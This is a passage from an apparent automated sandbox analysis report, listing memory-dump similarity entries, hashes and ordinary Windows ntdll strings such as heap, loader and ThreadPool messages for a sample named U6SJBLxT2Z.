                                                                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 328B5167
                                                                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 328B5272
                                                                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 328B534B
                                                                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 328B519B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                  • API String ID: 0-258546922
                                                                                                                                                                                                  • Opcode ID: cdd23fc283077d47dbfcbfecd22cb294fd12ab58a82c2524221149f3d0c3f290
                                                                                                                                                                                                  • Instruction ID: a6cae119a1528da9e042f2382579b1ae8b39cd0c64e1870ff547110830a67e51
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdd23fc283077d47dbfcbfecd22cb294fd12ab58a82c2524221149f3d0c3f290
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97F15FBAD02219EFDF15CF98C940ADEB7B9EF08750F50406AE915A7310EBB59E01CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: 6ba00023fc3cd0ca872b28f4b0c33e1856bc8d728a95f81b509c2a0ec4155283
                                                                                                                                                                                                  • Instruction ID: 596f123a760975946f539b51ebcd9d865fa18cdb47251832243082d6057fb026
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ba00023fc3cd0ca872b28f4b0c33e1856bc8d728a95f81b509c2a0ec4155283
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF12A77F002119FDB18CF68C9A067DFBF5AF88214B19416DD866EB384EA34E941CB50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlSizeHeap
                                                                                                                                                                                                  • API String ID: 0-360004557
                                                                                                                                                                                                  • Opcode ID: 79deac63986ed2e8949e3144972e91fbc7dd62c4aeeb69d3e4818c67f16243f1
                                                                                                                                                                                                  • Instruction ID: c90eadc5d82be60054ca0b729b456e0ce24bba58bb3377eee4080e3a67bbc569
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79deac63986ed2e8949e3144972e91fbc7dd62c4aeeb69d3e4818c67f16243f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801703E115140DEF305C32CD808FE677A4EB83B39F1444C9E014CB7A1DEA9A840D560
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                  • API String ID: 0-2084224854
                                                                                                                                                                                                  • Opcode ID: 6d1e4e07d12fdba4ec0b0c7e125ca21215dcec56f1ce9518dc30d8b30f025bd8
                                                                                                                                                                                                  • Instruction ID: 203d552f53681b080816862459ebc7ed29da02803cb156e837eff040180f7957
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d1e4e07d12fdba4ec0b0c7e125ca21215dcec56f1ce9518dc30d8b30f025bd8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE1D078A083459FE719CF28C8907BABBE1AF59744F14C85DE89ACB246EB34D941CB50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32890586
                                                                                                                                                                                                  • kLsE, xrefs: 328905FE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                  • API String ID: 3446177414-2547482624
                                                                                                                                                                                                  • Opcode ID: d523dff1deefaae68448aa3d48c5f57ebc795cfe73afbca75733d013402da3a5
                                                                                                                                                                                                  • Instruction ID: 9fd9367d82cd85fd52f4e2188b14f4a4781e92723389809d3bf2887aa0138744
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d523dff1deefaae68448aa3d48c5f57ebc795cfe73afbca75733d013402da3a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 345190B9A0074ADFE714DFA4C4407EAB7F4AF45304F00883ED9AAE7241EB749545CBA2
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                                  • Opcode ID: 463b60957d3b67de054c6dbe40fb4054fe40b0c26118fb43bebe087dfe19bd03
                                                                                                                                                                                                  • Instruction ID: 6009af890beb8d3a289b4833c461d5da875ac77dd6134f9d75cec66ca00b7fcb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 463b60957d3b67de054c6dbe40fb4054fe40b0c26118fb43bebe087dfe19bd03
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0C19B78208386DFE715CF58C480BDAB7E4FF85748F00896AF8999B250EB75C949CB52
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32901FE3, 329020BB
                                                                                                                                                                                                  • .Local, xrefs: 328C27F8
                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 329020C0
                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 32901FE8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                                  • Opcode ID: 326c6c56f8a4405d9d38272538d48974b80217c3396efaae31d50c97e108a83f
                                                                                                                                                                                                  • Instruction ID: 2e40a9cc580dec802f9e3b4a52ec8fa23c9a435e2f51d2a943d3bd1cea33b1e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 326c6c56f8a4405d9d38272538d48974b80217c3396efaae31d50c97e108a83f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9A18E7990132D9FDB24CF54D884B99B3B5BF58358F1041E9D808AB2A9DB70DE85CF90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 328F0DEC
                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 328F0E2F
                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 328F0E72
                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 328F0EB5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                                  • Opcode ID: 2e1196dd5f448303305077f65a2cab815fb86f4f1ef6ebc3a51e1440e891fb3e
                                                                                                                                                                                                  • Instruction ID: cc8982fee655757a74ee32032aceb9c654a7b8019c4fbd5d6d24dc433ce40ee7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e1196dd5f448303305077f65a2cab815fb86f4f1ef6ebc3a51e1440e891fb3e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC7125B9904314AFD750DF58C880F8B7BA8EF85794F404868FC588B25AD775E188CBD2
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                  • API String ID: 0-1391187441
                                                                                                                                                                                                  • Opcode ID: edcaf23b9488276462d38c1a408f0236fe51eccd036876b833ce064ddbb731f6
                                                                                                                                                                                                  • Instruction ID: 84863a945bfb59574ea3e698070febd944c23d638c62e64fb795967f51cf9ec6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: edcaf23b9488276462d38c1a408f0236fe51eccd036876b833ce064ddbb731f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B31B43E901218EFD711CB58CC84FAAB7B8FF457A4F1040A1E925E7391DB74D941CA60
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: 363b31506d95dc8cbbfd88a31c7467fe243a7f0941474afdc1796d23ec95a08e
                                                                                                                                                                                                  • Instruction ID: 978c23ebceeafa1e9f03d0abcdce62ba8f592fd3a587a2275e1e71c85742039e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 363b31506d95dc8cbbfd88a31c7467fe243a7f0941474afdc1796d23ec95a08e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D551F0BCA04709EFEB09CF68C844BADB7B5BF48765F10416AE81697290DBB4D911CB80
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • HEAP: , xrefs: 328EF6BE
                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 328EF6B1
                                                                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 328EF6D3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                  • Opcode ID: 274f5d0b19ac6ee4a47f508269c110e60302cf55e51a660c644a60644c323e30
                                                                                                                                                                                                  • Instruction ID: e15fcfc5797fc15ae8ceb761a9df60e5a75f37015e2f18abf5150a0a37d8c8d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274f5d0b19ac6ee4a47f508269c110e60302cf55e51a660c644a60644c323e30
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B612E27C708355EFE718CF24C480BA6B7E1BF56744F64859DE89A8B685DB70E840CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                                  • API String ID: 0-1168191160
                                                                                                                                                                                                  • Opcode ID: 1d4f9042fd73140f113653d363c2ee3533ffafadb785c307aa1cabfc373ad65b
                                                                                                                                                                                                  • Instruction ID: c07856b552ee5c89d09633c32cb90a38f8b962acfc10ac3f7c5726b74e803181
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d4f9042fd73140f113653d363c2ee3533ffafadb785c307aa1cabfc373ad65b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89F161B9A0032C8FDB24DF18CC90BD9B3B9AF48754F4480E9DA09A7245DB719E85CF59
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 329000C7
                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 32900128
                                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 329000F1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                                  • Opcode ID: 73449446adba633f023d406503090b241e439ff1f2d099a126a3900080b1b356
                                                                                                                                                                                                  • Instruction ID: 62ed2e14536d99b41e3910d8ef2793dc1e6af6eddf385e8bdf4ae920c26f214e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73449446adba633f023d406503090b241e439ff1f2d099a126a3900080b1b356
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25E1D0786087459FEB25CF68C880B0AB7E0BF95358F104A5DF9A98B3E1DB74D944CB42
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                  • API String ID: 0-2391371766
                                                                                                                                                                                                  • Opcode ID: 22d8364ad06727d039f816fc3a293b59a27835d9cf33b8ebd529869d300c4d52
                                                                                                                                                                                                  • Instruction ID: 14d29fed19f038d66d8ba57f7398d0deb7ec7877d9fa219ed843e80eb7db5a82
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22d8364ad06727d039f816fc3a293b59a27835d9cf33b8ebd529869d300c4d52
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53B1D1B5604349AFE311CF55CC81B6BB7F8BB48754F400929FA549B280CBB0F848CB9A
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                                  • Opcode ID: a6c49bf7a97b4996cced953ddd773dcf6b60ed345b9a6c4d3ee4337baf04974b
                                                                                                                                                                                                  • Instruction ID: 262a0dbf54c4a0485637581d59e7f234ac7e2e8883e9d2a1938c8528a143906e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6c49bf7a97b4996cced953ddd773dcf6b60ed345b9a6c4d3ee4337baf04974b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83A16E79D012299BDB21DF28CC88BDAB7B8EF45714F1005EAE90DA7250DB759E84CF50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                                  • API String ID: 0-318774311
                                                                                                                                                                                                  • Opcode ID: 71d2c640b8f25fe288de61269955d84721f63dbf3492d6cd0792d3771104a1a9
                                                                                                                                                                                                  • Instruction ID: 06f5119638d497630ee2a04251e99482ce98b11894cb2be6fabd764defcb6545
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71d2c640b8f25fe288de61269955d84721f63dbf3492d6cd0792d3771104a1a9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B819E75608348AFE711CB24C940B6AB7E8FF88B54F40096DF9949B294DF74D904CB96
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                  • API String ID: 0-373624363
                                                                                                                                                                                                  • Opcode ID: 6ad5a388b93104185160fe6d25763d40ce67cb3023c634912bd9d692873fdc40
                                                                                                                                                                                                  • Instruction ID: 7072865822952b19a78e531327aea5bf60c318e601d9470dc03d0ca6809acb7c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad5a388b93104185160fe6d25763d40ce67cb3023c634912bd9d692873fdc40
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0891DD79A04349DFEB11CF58D8407EEB7B0EF45368F148199E819AB290DB79DA80CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3296B3AA
                                                                                                                                                                                                  • TargetNtPath, xrefs: 3296B3AF
                                                                                                                                                                                                  • GlobalizationUserSettings, xrefs: 3296B3B4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                  • API String ID: 0-505981995
                                                                                                                                                                                                  • Opcode ID: 5af0acc432dd02323caea35edf636a408b8d631d27a8fea851cdf0efa52ee274
                                                                                                                                                                                                  • Instruction ID: 946cfa90344982c317f38d433242cb4ddcd7fc2bfbb4012239ff78bbab4e3351
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af0acc432dd02323caea35edf636a408b8d631d27a8fea851cdf0efa52ee274
